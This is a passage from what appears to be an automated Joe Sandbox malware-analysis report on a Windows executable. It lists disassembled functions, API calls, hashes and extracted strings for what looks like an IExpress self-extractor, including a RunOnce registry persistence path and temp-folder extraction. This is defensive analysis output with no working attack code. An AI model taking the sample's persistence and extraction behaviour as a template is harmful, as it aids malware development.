                                                                                                                • Associated: 00000000.00000002.1326159507.00007FF6FD219000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1326179335.00007FF6FD21C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1326199376.00007FF6FD21E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_7ff6fd210000_nTHivMbGpg.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: File$Find$lstrcmp$AttributesCloseDeleteDirectoryFirstNextRemove
                                                                                                                • String ID:
                                                                                                                • API String ID: 836429354-0
                                                                                                                • Opcode ID: 91cc5e1a10547be1af5b881470c4a552975bb6d87df7be44110ed190adb22146
                                                                                                                • Instruction ID: 21615bdc59876c8c341932f6cd9e701a89cdf4395ec4d25bc62c7fa4cf8af79d
                                                                                                                • Opcode Fuzzy Hash: 91cc5e1a10547be1af5b881470c4a552975bb6d87df7be44110ed190adb22146
                                                                                                                • Instruction Fuzzy Hash: 93514C62618A8696EB018F20D9442E977A0FB45B84F84C271DB6DC36D5FF3EE509C3C0
                                                                                                                Function 00007FF6FD2163DC Relevance: 19.3, APIs: 8, Strings: 3, Instructions: 97registryfileCOMMON
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1326141463.00007FF6FD211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FD210000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1326123227.00007FF6FD210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1326159507.00007FF6FD219000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1326179335.00007FF6FD21C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1326199376.00007FF6FD21E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_7ff6fd210000_nTHivMbGpg.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: DeleteFileFreeLocal$AttributesCloseCurrentDirectoryOpenValue
                                                                                                                • String ID: C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\$Software\Microsoft\Windows\CurrentVersion\RunOnce$wextract_cleanup0
                                                                                                                • API String ID: 3049360512-2947520418
                                                                                                                • Opcode ID: 412a7dec44b3798a2430baef0d9910c820e9379bb72a94b578006faa3a53e04f
                                                                                                                • Instruction ID: 39bcb495aaaf87f094ae5aa20c421a562273d8852b5be93f686a9b4c23fd30c3
                                                                                                                • Opcode Fuzzy Hash: 412a7dec44b3798a2430baef0d9910c820e9379bb72a94b578006faa3a53e04f
                                                                                                                • Instruction Fuzzy Hash: 2C511A21A0868286EB108B14EA543B977A0FB85B46F94C131DB6DC36D5FF2EF448C7C0
                                                                                                                Function 00007FF6FD2165A8 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 88fileCOMMON
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1326141463.00007FF6FD211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FD210000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1326123227.00007FF6FD210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1326159507.00007FF6FD219000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1326179335.00007FF6FD21C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1326199376.00007FF6FD21E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_7ff6fd210000_nTHivMbGpg.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: File$Directory$AttributesCreateDeleteNameRemoveTemp
                                                                                                                • String ID: IXP$IXP%03d.TMP
                                                                                                                • API String ID: 4001122843-3932986939
                                                                                                                • Opcode ID: cd7b86485b10685b83dcd6330150a770b90a6da73959a3ca5b2625007923a5f8
                                                                                                                • Instruction ID: fffab3cab413ed97ea3a2c9ac9902e8839dd5e77bb9212bbb5cd2f980329749c
                                                                                                                • Opcode Fuzzy Hash: cd7b86485b10685b83dcd6330150a770b90a6da73959a3ca5b2625007923a5f8
                                                                                                                • Instruction Fuzzy Hash: 34316F31708A8186EB109B15AA502B9BAA1FB89B85F45C131DF6EC37D5FF3EE445C6C0
                                                                                                                Function 00007FF6FD218460 Relevance: 12.1, APIs: 8, Instructions: 138sleepCOMMON
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 697 7ff6fd218460-7ff6fd2184a9 call 7ff6fd218bf4 GetStartupInfoW 701 7ff6fd2184ab-7ff6fd2184b6 697->701 702 7ff6fd2184b8-7ff6fd2184bb 701->702 703 7ff6fd2184c2-7ff6fd2184cb 701->703 704 7ff6fd2184da-7ff6fd2184e5 Sleep 702->704 705 7ff6fd2184bd 702->705 706 7ff6fd2184e7-7ff6fd2184ef 703->706 707 7ff6fd2184cd-7ff6fd2184d5 _amsg_exit 703->707 704->701 705->703 709 7ff6fd2184f1-7ff6fd21850e 706->709 710 7ff6fd218554 706->710 708 7ff6fd21855e-7ff6fd218567 707->708 711 7ff6fd218586-7ff6fd218588 708->711 712 7ff6fd218569-7ff6fd21857c _initterm 708->712 713 7ff6fd218512-7ff6fd218515 709->713 710->708 716 7ff6fd21858a-7ff6fd21858c 711->716 717 7ff6fd218593-7ff6fd21859b 711->717 712->711 714 7ff6fd218517-7ff6fd218519 713->714 715 7ff6fd218546-7ff6fd218548 713->715 718 7ff6fd21851b-7ff6fd21851f 714->718 719 7ff6fd21854a-7ff6fd21854f 714->719 715->708 715->719 716->717 720 7ff6fd21859d-7ff6fd2185ab call 7ff6fd218b60 717->720 721 7ff6fd2185d1-7ff6fd2185e0 717->721 722 7ff6fd21853b-7ff6fd218544 718->722 723 7ff6fd218521-7ff6fd218537 718->723 724 7ff6fd2186bb-7ff6fd2186d0 719->724 720->721 735 7ff6fd2185ad-7ff6fd2185c7 720->735 726 7ff6fd2185e4-7ff6fd2185ea 721->726 722->713 723->722 727 7ff6fd21865d-7ff6fd218660 726->727 728 7ff6fd2185ec-7ff6fd2185ee 726->728 730 7ff6fd21866f-7ff6fd218677 _ismbblead 727->730 731 7ff6fd218662-7ff6fd21866b 727->731 732 7ff6fd2185f0-7ff6fd2185f2 728->732 733 7ff6fd2185f4-7ff6fd2185f9 728->733 736 7ff6fd218679-7ff6fd21867c 730->736 737 7ff6fd218681-7ff6fd218689 730->737 731->730 732->727 732->733 738 7ff6fd218607-7ff6fd21863c call 7ff6fd212d70 733->738 739 7ff6fd2185fb-7ff6fd218605 733->739 735->721 736->737 737->726 742 7ff6fd218646-7ff6fd21864d 738->742 743 7ff6fd21863e-7ff6fd218640 exit 738->743 739->733 744 7ff6fd21865b 742->744 745 7ff6fd21864f-7ff6fd218655 _cexit 742->745 743->742 744->724 745->744
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1326141463.00007FF6FD211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FD210000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1326123227.00007FF6FD210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1326159507.00007FF6FD219000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1326179335.00007FF6FD21C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1326199376.00007FF6FD21E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_7ff6fd210000_nTHivMbGpg.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Current$CountTickTime$CounterFileImageInfoNonwritablePerformanceProcessQuerySleepStartupSystemThread_amsg_exit_cexit_initterm_ismbbleadexit
                                                                                                                • String ID:
                                                                                                                • API String ID: 2995914023-0
                                                                                                                • Opcode ID: 452453f8cba86726c033ce9af079bec980333149c11a377a6a6421c59040ebf2
                                                                                                                • Instruction ID: e78ae67fbe1bc5c7247a4a4eff9f2d724b64b882b5ef9aacead35b30af5f637f
                                                                                                                • Opcode Fuzzy Hash: 452453f8cba86726c033ce9af079bec980333149c11a377a6a6421c59040ebf2
                                                                                                                • Instruction Fuzzy Hash: 5C612B35A0C646A6F7608B25EA90379A2E0FF48794F558035DB6DC22D4FF3EF94196C0
                                                                                                                Function 00007FF6FD216294 Relevance: 12.1, APIs: 5, Strings: 3, Instructions: 75memoryCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                  • Part of subcall function 00007FF6FD2151F8: FindResourceA.KERNEL32(?,?,00000000,00007FF6FD212F6B), ref: 00007FF6FD215220
                                                                                                                  • Part of subcall function 00007FF6FD2151F8: SizeofResource.KERNEL32(?,?,00000000,00007FF6FD212F6B), ref: 00007FF6FD215231
                                                                                                                  • Part of subcall function 00007FF6FD2151F8: FindResourceA.KERNEL32(?,?,00000000,00007FF6FD212F6B), ref: 00007FF6FD215257
                                                                                                                  • Part of subcall function 00007FF6FD2151F8: LoadResource.KERNEL32(?,?,00000000,00007FF6FD212F6B), ref: 00007FF6FD215268
                                                                                                                  • Part of subcall function 00007FF6FD2151F8: LockResource.KERNEL32(?,?,00000000,00007FF6FD212F6B), ref: 00007FF6FD215277
                                                                                                                  • Part of subcall function 00007FF6FD2151F8: memcpy_s.MSVCRT ref: 00007FF6FD215296
                                                                                                                  • Part of subcall function 00007FF6FD2151F8: FreeResource.KERNEL32(?,?,00000000,00007FF6FD212F6B), ref: 00007FF6FD2152A5
                                                                                                                • LocalAlloc.KERNEL32(?,?,?,?,00000000,00007FF6FD21324B), ref: 00007FF6FD2162B9
                                                                                                                • LocalFree.KERNEL32 ref: 00007FF6FD216332
                                                                                                                  • Part of subcall function 00007FF6FD214F2C: LoadStringA.USER32 ref: 00007FF6FD214FBC
                                                                                                                  • Part of subcall function 00007FF6FD214F2C: MessageBoxA.USER32 ref: 00007FF6FD214FFC
                                                                                                                  • Part of subcall function 00007FF6FD217958: GetLastError.KERNEL32 ref: 00007FF6FD21795C
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1326141463.00007FF6FD211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FD210000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1326123227.00007FF6FD210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1326159507.00007FF6FD219000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1326179335.00007FF6FD21C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1326199376.00007FF6FD21E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_7ff6fd210000_nTHivMbGpg.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Resource$FindFreeLoadLocal$AllocErrorLastLockMessageSizeofStringmemcpy_s
                                                                                                                • String ID: $<None>$UPROMPT
                                                                                                                • API String ID: 957408736-2569542085
                                                                                                                • Opcode ID: bce953315df2136bd9c83a7e38e7c9bcfbdf6b05f60fc9f9bc5cb1955f243e78
                                                                                                                • Instruction ID: 6051fb2a77e0ee2330a125af8c0f9e7638d7e3fbe4712d465b5b96a61f038dcf
                                                                                                                • Opcode Fuzzy Hash: bce953315df2136bd9c83a7e38e7c9bcfbdf6b05f60fc9f9bc5cb1955f243e78
                                                                                                                • Instruction Fuzzy Hash: A6314F71A0C24286E7205B20A65177E7A61FB85789F40D135DB6DC66D1FF7EF0448BC0
                                                                                                                Function 00007FF6FD2155C0 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 164filestringCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1326141463.00007FF6FD211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FD210000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1326123227.00007FF6FD210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1326159507.00007FF6FD219000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1326179335.00007FF6FD21C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1326199376.00007FF6FD21E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_7ff6fd210000_nTHivMbGpg.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CreateFile$lstrcmp
                                                                                                                • String ID: *MEMCAB
                                                                                                                • API String ID: 1301100335-3211172518
                                                                                                                • Opcode ID: a2c1f66350d6024a7f804a88bc9b7da19f54bdbcb5e3280bfb267e90ce3ff26c
                                                                                                                • Instruction ID: c35a26c82117787522ea0be20eb73f50ccfd48d6167d5823f41f1935e3418548
                                                                                                                • Opcode Fuzzy Hash: a2c1f66350d6024a7f804a88bc9b7da19f54bdbcb5e3280bfb267e90ce3ff26c
                                                                                                                • Instruction Fuzzy Hash: D461C462A0C78286F7618B14A6853797AA1EB45BA4F148371CB7DC27E0FF3DB40686C0
                                                                                                                Function 00007FF6FD215AF1 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 124timeCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1326141463.00007FF6FD211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FD210000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1326123227.00007FF6FD210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1326159507.00007FF6FD219000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1326179335.00007FF6FD21C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1326199376.00007FF6FD21E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_7ff6fd210000_nTHivMbGpg.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: FileTime$AttributesDateItemLocalText
                                                                                                                • String ID: C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\
                                                                                                                • API String ID: 851750970-1955631000
                                                                                                                • Opcode ID: caf4f2272670990647462f14bfaf3187ac79d74cb37a0834bbd78866cb2a2d6f
                                                                                                                • Instruction ID: d211e5995b3fafd65130343c8111621dd939c36e9b9d0a502e750dabdb3a90c8
                                                                                                                • Opcode Fuzzy Hash: caf4f2272670990647462f14bfaf3187ac79d74cb37a0834bbd78866cb2a2d6f
                                                                                                                • Instruction Fuzzy Hash: 77514E22A19A4681EB619F21D6501BA63B0FB44B54F448272DB7EC36E8FE2EF545C7C0
                                                                                                                Function 00007FF6FD216D9C Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 93memoryCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1326141463.00007FF6FD211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FD210000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1326123227.00007FF6FD210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1326159507.00007FF6FD219000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1326179335.00007FF6FD21C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1326199376.00007FF6FD21E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_7ff6fd210000_nTHivMbGpg.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AllocLocal
                                                                                                                • String ID: TMP4351$.TMP
                                                                                                                • API String ID: 3494564517-2619824408
                                                                                                                • Opcode ID: c669d64d882b60482da13300ba4968c1aecf883c3203920dff0371cbf708ca20
                                                                                                                • Instruction ID: 5518bd6cd218e1a9c6f2384461422a08efae454eb82afb639b1b4a420056fe3b
                                                                                                                • Opcode Fuzzy Hash: c669d64d882b60482da13300ba4968c1aecf883c3203920dff0371cbf708ca20
                                                                                                                • Instruction Fuzzy Hash: E7418B62A0868186FB104B24A6103BD7A90BB85BA5F588334DB7EC37D5FF7EE40587C0
                                                                                                                Function 00007FF6FD2123C0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 47registryCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1326141463.00007FF6FD211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FD210000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1326123227.00007FF6FD210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1326159507.00007FF6FD219000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1326179335.00007FF6FD21C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1326199376.00007FF6FD21E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_7ff6fd210000_nTHivMbGpg.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CloseOpenQueryValue
                                                                                                                • String ID: PendingFileRenameOperations$System\CurrentControlSet\Control\Session Manager
                                                                                                                • API String ID: 3677997916-3057196482
                                                                                                                • Opcode ID: 72a84aa0c0c68ebabc0f94760f7052dc41f3436717cb00a692564cbfb68d1e7c
                                                                                                                • Instruction ID: 316bdc45eff4ef82df49c5bc60ef308c7ba3005b5a7846247bd42fbd51a88119
                                                                                                                • Opcode Fuzzy Hash: 72a84aa0c0c68ebabc0f94760f7052dc41f3436717cb00a692564cbfb68d1e7c
                                                                                                                • Instruction Fuzzy Hash: 07114F36A08B5287E7109B14E55157AB6B0FF8A750F508135EBADC2798FF2EE4448A80
                                                                                                                Function 00007FF6FD2158D0 Relevance: 3.1, APIs: 2, Instructions: 51fileCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                  • Part of subcall function 00007FF6FD213C80: MsgWaitForMultipleObjects.USER32(?,?,?,?,?,?,?,?,?,00000001,00007FF6FD213B49), ref: 00007FF6FD213CA4
                                                                                                                  • Part of subcall function 00007FF6FD213C80: PeekMessageA.USER32 ref: 00007FF6FD213CC9
                                                                                                                  • Part of subcall function 00007FF6FD213C80: PeekMessageA.USER32 ref: 00007FF6FD213D0D
                                                                                                                • WriteFile.KERNELBASE ref: 00007FF6FD215924
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1326141463.00007FF6FD211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FD210000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1326123227.00007FF6FD210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1326159507.00007FF6FD219000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1326179335.00007FF6FD21C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1326199376.00007FF6FD21E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_7ff6fd210000_nTHivMbGpg.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessagePeek$FileMultipleObjectsWaitWrite
                                                                                                                • String ID:
                                                                                                                • API String ID: 1084409-0
                                                                                                                • Opcode ID: df09df05b6a8f76d98ff4e568d39aff5741097c23a6c3239c69c04500cd56e3d
                                                                                                                • Instruction ID: 7ab910376f474aa8783b8086346d7eaaf841467a17f8caa1ed32e5e26418b28a
                                                                                                                • Opcode Fuzzy Hash: df09df05b6a8f76d98ff4e568d39aff5741097c23a6c3239c69c04500cd56e3d
                                                                                                                • Instruction Fuzzy Hash: B7210921A0854286E7118F16E644335A7A1AF857A8F54C235DA6DCA6E4FF7EF405CBC0
                                                                                                                Function 00007FF6FD2153B8 Relevance: 3.0, APIs: 2, Instructions: 43COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1326141463.00007FF6FD211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FD210000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1326123227.00007FF6FD210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1326159507.00007FF6FD219000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1326179335.00007FF6FD21C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1326199376.00007FF6FD21E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_7ff6fd210000_nTHivMbGpg.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Resource$AttributesFile$DialogFindFreeIndirectLoadParam
                                                                                                                • String ID:
                                                                                                                • API String ID: 2018477427-0
                                                                                                                • Opcode ID: 4017b6c058a6be902cddc169abc6d9dcaedc57a8715b21c16ee5d7d8bc7a3f89
                                                                                                                • Instruction ID: 5ae08cdb2dab567d20f19fdfd241b38554c6fcc7825681e82a9ab491b9f9f73e
                                                                                                                • Opcode Fuzzy Hash: 4017b6c058a6be902cddc169abc6d9dcaedc57a8715b21c16ee5d7d8bc7a3f89
                                                                                                                • Instruction Fuzzy Hash: 6411853191C65282FB118F14A68437466A0FB45319F24C270DB6EC66E1FF7FB88582C0
                                                                                                                Function 00007FF6FD217E08 Relevance: 1.5, APIs: 1, Instructions: 43COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1326141463.00007FF6FD211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FD210000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1326123227.00007FF6FD210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1326159507.00007FF6FD219000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1326179335.00007FF6FD21C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1326199376.00007FF6FD21E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_7ff6fd210000_nTHivMbGpg.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CharPrev
                                                                                                                • String ID:
                                                                                                                • API String ID: 122130370-0
                                                                                                                • Opcode ID: f69c92ee4560cd4f0bb57aa589b20250cdd633262219f505effccc195a14fdcf
                                                                                                                • Instruction ID: 5b617896d4522fd2575fb4a886731550fbd04036157c98545086c32949813107
                                                                                                                • Opcode Fuzzy Hash: f69c92ee4560cd4f0bb57aa589b20250cdd633262219f505effccc195a14fdcf
                                                                                                                • Instruction Fuzzy Hash: 57018012A0C6C1C6F7114B15AA4026DBA90B785BA0F58D270EB79C77D7EF3DE88287C0
                                                                                                                Function 00007FF6FD2159B0 Relevance: 1.3, APIs: 1, Instructions: 27COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1326141463.00007FF6FD211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FD210000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1326123227.00007FF6FD210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1326159507.00007FF6FD219000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1326179335.00007FF6FD21C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1326199376.00007FF6FD21E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_7ff6fd210000_nTHivMbGpg.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CloseHandle
                                                                                                                • String ID:
                                                                                                                • API String ID: 2962429428-0
                                                                                                                • Opcode ID: c7d790a02c12fb3e5c56208d3f056b28bd5316e6bc6357f0cdb18446cbb40734
                                                                                                                • Instruction ID: 25c51235a7947353b85925d98565c164496ce14da378ba044942c6067635ba3c
                                                                                                                • Opcode Fuzzy Hash: c7d790a02c12fb3e5c56208d3f056b28bd5316e6bc6357f0cdb18446cbb40734
                                                                                                                • Instruction Fuzzy Hash: 5BF01D326186C2D2EB184F25F6811B876B0EB48B58F148275DB3BC76D4EF79E485C790

                                                                                                                Non-executed Functions

                                                                                                                Function 00007FF6FD21366E Relevance: 28.2, APIs: 13, Strings: 3, Instructions: 177windowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1326141463.00007FF6FD211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FD210000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1326123227.00007FF6FD210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1326159507.00007FF6FD219000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1326179335.00007FF6FD21C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1326199376.00007FF6FD21E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_7ff6fd210000_nTHivMbGpg.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Window$DialogItem$DesktopEnableLoadMessageSendStringText
                                                                                                                • String ID: $124$C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\
                                                                                                                • API String ID: 3530494346-2944290832
                                                                                                                • Opcode ID: ccd9306e1016298e6bebe3b198e952bf491475324bfa792ea5420485550b1857
                                                                                                                • Instruction ID: 16998923f189589346ffc770de136d19814939cfc35cca794f7c55c4f651e94f
                                                                                                                • Opcode Fuzzy Hash: ccd9306e1016298e6bebe3b198e952bf491475324bfa792ea5420485550b1857
                                                                                                                • Instruction Fuzzy Hash: 26717171E0C68286F7609B61A7803796A92AB85B95F54C130CB7EC26C5FF7EF40587C0
                                                                                                                Function 00007FF6FD215F7E Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 86windowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                  • Part of subcall function 00007FF6FD2151F8: FindResourceA.KERNEL32(?,?,00000000,00007FF6FD212F6B), ref: 00007FF6FD215220
                                                                                                                  • Part of subcall function 00007FF6FD2151F8: SizeofResource.KERNEL32(?,?,00000000,00007FF6FD212F6B), ref: 00007FF6FD215231
                                                                                                                  • Part of subcall function 00007FF6FD2151F8: FindResourceA.KERNEL32(?,?,00000000,00007FF6FD212F6B), ref: 00007FF6FD215257
                                                                                                                  • Part of subcall function 00007FF6FD2151F8: LoadResource.KERNEL32(?,?,00000000,00007FF6FD212F6B), ref: 00007FF6FD215268
                                                                                                                  • Part of subcall function 00007FF6FD2151F8: LockResource.KERNEL32(?,?,00000000,00007FF6FD212F6B), ref: 00007FF6FD215277
                                                                                                                  • Part of subcall function 00007FF6FD2151F8: memcpy_s.MSVCRT ref: 00007FF6FD215296
                                                                                                                  • Part of subcall function 00007FF6FD2151F8: FreeResource.KERNEL32(?,?,00000000,00007FF6FD212F6B), ref: 00007FF6FD2152A5
                                                                                                                • FindResourceA.KERNEL32(?,?,?,?,?,?,?,?,00000000,00007FF6FD213432), ref: 00007FF6FD215FB0
                                                                                                                • LoadResource.KERNEL32(?,?,?,?,?,?,?,?,00000000,00007FF6FD213432), ref: 00007FF6FD215FC1
                                                                                                                • LockResource.KERNEL32(?,?,?,?,?,?,?,?,00000000,00007FF6FD213432), ref: 00007FF6FD215FD0
                                                                                                                • GetDlgItem.USER32 ref: 00007FF6FD215FFD
                                                                                                                • ShowWindow.USER32(?,?,?,?,?,?,?,?,00000000,00007FF6FD213432), ref: 00007FF6FD21600E
                                                                                                                • GetDlgItem.USER32 ref: 00007FF6FD216026
